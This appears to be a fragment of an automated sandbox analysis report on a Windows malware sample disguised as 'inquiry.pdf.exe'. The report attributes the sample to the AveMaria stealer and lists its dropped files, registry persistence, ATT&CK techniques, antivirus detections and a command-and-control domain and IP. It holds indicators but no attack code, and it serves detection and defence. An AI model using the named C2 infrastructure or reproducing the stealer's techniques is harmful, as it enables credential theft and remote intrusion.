            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Users\user\AppData\Roaming\glonkjhg.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Increases the number of concurrent connection per server for Internet Explorer
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1916, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Valid Accounts            		Windows Management Instrumentation1
            Valid Accounts            		1
            Valid Accounts            		1
            Disable or Modify Tools            		21
            Input Capture            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Endpoint Denial of Service
            Default AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		12
            Obfuscated Files or Information            		LSASS Memory12
            System Information Discovery            		Remote Desktop Protocol21
            Input Capture            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)211
            Process Injection            		1
            Software Packing            		Security Account Manager11
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            Registry Run Keys / Startup Folder            		1
            Timestomp            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
            Masquerading            		LSA Secrets21
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size Limits13
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Valid Accounts            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Modify Registry            		DCSync11
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem1
            System Network Configuration Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)21
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)211
            Process Injection            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
            Hidden Files and Directories            		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
            Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
            Hidden Users            		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 715157 Sample: inquiry.pdf.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 60 hannoyputa.giize.com 2->60 74 Multi AV Scanner detection for domain / URL 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 Antivirus / Scanner detection for submitted sample 2->78 80 9 other signatures 2->80 10 inquiry.pdf.exe 15 3 2->10         started        signatures3 process4 dnsIp5 68 www.google.com 142.250.203.100, 443, 49699, 49705 GOOGLEUS United States 10->68 54 C:\Users\user\AppData\...\inquiry.pdf.exe.log, ASCII 10->54 dropped 102 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->102 15 cmd.exe 3 10->15         started        19 cmd.exe 1 10->19         started        file6 signatures7 process8 file9 56 C:\Users\user\AppData\Roaming\glonkjhg.exe, PE32 15->56 dropped 58 C:\Users\...\glonkjhg.exe:Zone.Identifier, ASCII 15->58 dropped 70 Uses ping.exe to sleep 15->70 21 glonkjhg.exe 14 5 15->21         started        26 conhost.exe 15->26         started        28 PING.EXE 1 15->28         started        30 PING.EXE 1 15->30         started        72 Uses ping.exe to check the status of other devices and networks 19->72 32 reg.exe 1 1 19->32         started        34 PING.EXE 1 19->34         started        36 conhost.exe 19->36         started        signatures10 process11 dnsIp12 62 www.google.com 21->62 52 C:\Users\user\AppData\Local\...\jhFFFffkl.exe, PE32 21->52 dropped 92 Antivirus detection for dropped file 21->92 94 Multi AV Scanner detection for dropped file 21->94 96 Machine Learning detection for dropped file 21->96 100 3 other signatures 21->100 38 jhFFFffkl.exe 2 21->38         started        41 AddInProcess32.exe 3 2 21->41         started        44 jhFFFffkl.exe 21->44         started        46 AddInProcess32.exe 21->46         started        98 Creates an undocumented autostart registry key 32->98 64 127.0.0.1 unknown unknown 34->64 file13 signatures14 process15 dnsIp16 82 Antivirus detection for dropped file 38->82 84 Multi AV Scanner detection for dropped file 38->84 86 Machine Learning detection for dropped file 38->86 48 jhFFFffkl.exe 38->48         started        66 hannoyputa.giize.com 23.105.131.206, 3027, 49706, 49707 LEASEWEB-USA-NYC-11US United States 41->66 88 Increases the number of concurrent connection per server for Internet Explorer 41->88 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->90 50 jhFFFffkl.exe 44->50         started        signatures17 process18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            inquiry.pdf.exe39%ReversingLabsByteCode-MSIL.Infostealer.Generic
            inquiry.pdf.exe100%AviraHEUR/AGEN.1251650
            inquiry.pdf.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\glonkjhg.exe100%AviraHEUR/AGEN.1251650
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe100%AviraTR/Agent.able
            C:\Users\user\AppData\Roaming\glonkjhg.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe77%ReversingLabsByteCode-MSIL.Dropper.CrimsonRAT
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe14%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\glonkjhg.exe39%ReversingLabsByteCode-MSIL.Infostealer.Generic

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            19.0.AddInProcess32.exe.900000.0.unpack100%AviraTR/Redcap.ghjptDownload File
            0.0.inquiry.pdf.exe.a90000.0.unpack100%AviraHEUR/AGEN.1251650Download File

            Domains

            SourceDetectionScannerLabelLink
            hannoyputa.giize.com6%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cnQ0%URL Reputationsafe
